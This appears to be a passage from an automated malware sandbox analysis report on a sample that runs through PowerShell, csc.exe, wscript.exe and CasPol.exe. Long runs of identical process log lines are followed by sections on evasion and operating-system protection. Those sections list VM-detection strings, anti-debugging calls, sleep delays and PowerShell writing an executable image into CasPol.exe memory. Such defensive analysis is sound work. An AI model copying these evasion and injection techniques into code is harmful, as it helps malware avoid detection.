                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (19 identical entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040E54F Sleep,ExitProcess
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004198C2 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 identical entries)
                      Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7690
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1900
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3896
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5809
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 9691
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bxb5o0my\bxb5o0my.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | API coverage: 8.8 %
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2264 | Thread sleep count: 7690 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3320 | Thread sleep count: 1900 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 432 | Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6068 | Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3004 | Thread sleep count: 293 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3004 | Thread sleep time: -879000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3004 | Thread sleep count: 9691 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3004 | Thread sleep time: -29073000s >= -30000s
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0044D5E9 FindFirstFileExA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00406AC2 FindFirstFileW,FindNextFileW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
                      Source: powershell.exe, 00000003.00000002.2228337741.0000000002A48000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWHI
                      Source: powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: wscript.exe, 00000007.00000003.2212973785.00000000058E5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
                      Source: wscript.exe, 00000007.00000003.2212973785.00000000058E5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8Y
                      Source: powershell.exe, 00000003.00000002.2235184005.000000000802F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: powershell.exe, 00000003.00000002.2235184005.000000000802F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWg
                      Source: powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000008.00000002.2524648452.0000000008060000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | API call chain: ExitProcess graph end node (graph_12-47351)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter (listed twice)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00442554 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0044E92E GetProcessHeap
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 identical entries)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00433CD7 SetUnhandledExceptionFilter

                      HIPS / PFW / Operating System Protection Evasion

                      Source: Yara match | File source: amsi32_5924.amsi.csv, type: OTHER (2 identical entries)
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000
